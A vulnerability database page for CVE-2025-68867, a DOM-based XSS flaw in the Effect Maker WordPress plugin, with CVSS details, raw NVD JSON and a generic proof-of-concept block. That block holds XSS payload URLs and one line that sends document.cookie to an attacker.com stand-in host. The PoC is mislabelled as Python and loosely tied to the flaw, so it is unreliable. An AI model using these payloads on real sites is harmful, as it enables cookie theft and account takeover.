Security Vulnerability Report
中文
CVE-2025-68867 CVSS 6.5 MEDIUM

CVE-2025-68867

Published: 2026-01-08 10:15:53
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in anibalwainstein Effect Maker effect-maker allows DOM-Based XSS.This issue affects Effect Maker: from n/a through <= 1.2.1.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Effect Maker effect-maker <= 1.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-68867 DOM型XSS PoC // 攻击者构造恶意URL,诱导受害者访问 // PoC 1: 使用script标签 const maliciousUrl = 'https://vulnerable-site.com/?param=<script>alert(document.cookie)</script>'; // PoC 2: 使用事件处理器 const eventXSS = 'https://vulnerable-site.com/?param=<img src=x onerror=alert(document.domain)>'; // PoC 3: 使用SVG元素 const svgXSS = 'https://vulnerable-site.com/?param=<svg onload=alert(localStorage.getItem("敏感数据"))>'; // 实际攻击场景 const attackUrl = 'https://vulnerable-site.com/effect-maker-page/?effect_id=1"><script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'; // 自动化测试脚本 async function testXSS(url) { const response = await fetch(url); const text = await response.text(); const parser = new DOMParser(); const doc = parser.parseFromString(text, 'text/html'); // 检测是否存在XSS漏洞点 const userInputs = doc.querySelectorAll('input, textarea, [data-user-input]'); userInputs.forEach(input => { if (input.value.includes('<script>') || input.value.includes('onerror=') || input.value.includes('onload=')) { console.log('Potential XSS vulnerability detected'); } }); }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68867", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:53.427", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in anibalwainstein Effect Maker effect-maker allows DOM-Based XSS.This issue affects Effect Maker: from n/a through <= 1.2.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/effect-maker/vulnerability/wordpress-effect-maker-plugin-1-2-1-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}